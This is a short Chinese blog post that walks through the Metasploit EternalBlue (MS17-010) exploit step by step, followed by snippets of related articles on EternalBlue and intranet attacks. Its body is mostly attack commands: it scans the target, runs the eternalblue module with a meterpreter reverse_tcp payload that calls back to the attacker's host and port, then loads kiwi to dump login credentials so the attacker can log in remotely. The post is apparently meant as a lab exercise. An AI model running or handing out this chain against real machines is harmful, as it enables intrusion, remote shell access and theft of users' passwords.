MSF永恒之蓝使用

简介: MSF永恒之蓝使用

MSF永恒之蓝MS17-010


1. 扫描


use auxiliary/scanner/smb/smb_ms17_010(加载模块扫描exp)

set RHOSTS 192.168.167.60(设置被扫描ip)

run(开始扫描,查看是否存在)


检测到可以使用永恒之蓝


2.


use exploit/windows/smb/ms17_010_eternalblue(加载模块)

set RHOSTS 192.168.167.60(IP)

set LHOST 192.168.167.48 (设置本机IP)

set LPORT 4444 (设置连接端口)

set payload windows/x64/meterpreter/reverse_tcp (设置payload) run (开始)

显示IP+端口>>>目标IP+端口(反弹成功)


shell(拿到权限)


3. 获取登录用户名密码


meterpreter > load kiwi

meterpreter > creds_msv

meterpreter > creds_wdigest


拿到登录密码


4. 下面就可以远程登录目标主机了

目录
相关文章
|
3月前
|
安全 网络安全 Windows
永恒之蓝上线CS
该文介绍了在内网环境下,利用永恒之蓝漏洞(EternalBlue)将攻击者控制台(CS)上线的方法。前提条件是目标机器可上网、无防火墙和杀毒软件,并且存在永恒之蓝漏洞。使用Erebus插件的eterblue功能,通过MSF生成DLL文件,再利用永恒之蓝漏洞注入到目标系统中。文中给出了MSF生成不同平台DLL的命令,并详细说明了如何替换CS工具中的DLL文件,最后展示了在Double中选择目标IP和系统位数进行攻击,成功上线CS的截图。
146 4
永恒之蓝上线CS
|
2月前
|
安全 网络安全 数据安全/隐私保护
【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
|
3月前
|
SQL 安全 测试技术
渗透测试基础之永恒之蓝漏洞复现
对于当下来说我们使用的电脑大多是win11或是win10,还是有很多政府和公司,或是学校中使用的系统还停留在win7系统.今天是我进行渗透测试的第一次实战,通过永恒之蓝漏洞利用对win7系统进行渗透,当然也会对渗透测试的流程进行一个详细的介绍.,渗透测试的流程信息较为详细,内容较多,如果想看实战流程,直接通过通过这次的渗透测试,虽然不是对web间进行渗透测试,但是通过实战能够使我能够熟悉渗透测试的流程,当然在实践过程中也出现了很多问题,例如从kali上传文件到win主机路径出现问题,配置攻击模块时将ip地址设置错误,但在我不断的思考和尝试下,最终解决了问题,对于我的解决问题的能力也是一种提升.
215 3
|
3月前
|
安全 网络协议 Shell
永恒之蓝(MS17-010)漏洞利用
永恒之蓝(MS17-010)漏洞利用
269 1
|
10月前
|
监控 安全 测试技术
ms17-010(永恒之蓝)漏洞复现
ms17-010(永恒之蓝)利用的端口是445端口。 本文主要讲解ms17-010(永恒之蓝)漏洞复现,分为四个部分:了解渗透测试流程,使用nmap工具对win7进行扫描,尝试ms17-010漏洞利用,结果展示。第一部分“了解渗透测试流程”可以略过,可以直接从第二部分“使用nmap工具对win7进行扫描”开始看起。
527 5
ms17-010(永恒之蓝)漏洞复现
|
8月前
|
安全 网络安全 Windows
CVE-2017-0143永恒之蓝复现
CVE-2017-0143永恒之蓝复现
88 0
|
9月前
|
安全 开发工具 git
win10永恒之黑漏洞复现
win10永恒之黑漏洞复现
91 0
|
9月前
|
安全 Shell Linux
kali (永恒之蓝MS17_010)漏洞复现
kali (永恒之蓝MS17_010)漏洞复现
176 0
|
10月前
|
安全 数据安全/隐私保护 Windows
“永恒之蓝”勒索病毒检测+恢复工具
预测第二波WannaCry勒索病毒攻击即将到来! NSA黑客武器库泄漏的“永恒之蓝”发起的病毒攻击事件。 解决方案:勒索蠕虫病毒文件恢复工具 检测工具下载
140 0
|
安全 网络协议 关系型数据库
永恒之蓝漏洞利用
永恒之蓝漏洞利用
175 0